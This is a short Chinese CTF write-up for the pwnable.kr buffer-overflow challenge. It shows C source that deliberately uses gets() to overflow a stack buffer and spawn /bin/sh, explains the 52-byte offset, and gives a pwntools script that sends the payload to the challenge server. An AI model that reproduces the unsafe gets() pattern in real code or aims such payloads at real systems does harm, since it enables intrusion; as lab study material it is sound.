缓冲区溢出 PWN

PWN
分析

  • 很明显是缓冲区溢出,就是构造一个读入覆盖原来传入的key的值为0xcafebabe就好,关键是怎么覆盖了

看代码

#include <stdio.h>
#include <string.h>
#include <stdlib.h>
void func(int key){
    char overflowme[32];
    printf("overflow me : ");
    gets(overflowme);   // smash me!
    if(key == 0xcafebabe){
        system("/bin/sh");
    }
    else{
        printf("Nah..\n");
    }
}
int main(int argc, char* argv[]){
    func(0xdeadbeef);
    return 0;
}

逆向分析

  • 先拿checksec跑一下

    说明这是一个32位ELF程序; RELRO为” Partial RELRO”,说明我们对GOT表具有写权限; Stack为”Canary
    found”说明程序启用了栈保护; NX Enabled说明开启了数据执行保护(DEP),我们很难通过shellcode来执行代码了;
    PIE Enabled说明采用了地址空间随机化。
    IDA Pro
    分析一下知道key的地址为bp+8h,overflowme的地址[bp-2ch],所以需要覆盖2ch+8h=52字节,然后构造'\x30'*52+'\xbe\xba\xfe\xca'即可,注意存储方式这里是小端存储

ShellCode

# -*- coding: utf-8 -*-
import os
import sys
from pwn import *
def dec():
    payload = '\x30'*52+'\xbe\xba\xfe\xca'
    p = remote('pwnable.kr', 9000)
    p.sendline(payload)
    p.interactive()

if __name__ == '__main__':
    dec()

FLAG

  • cat flag
添加新评论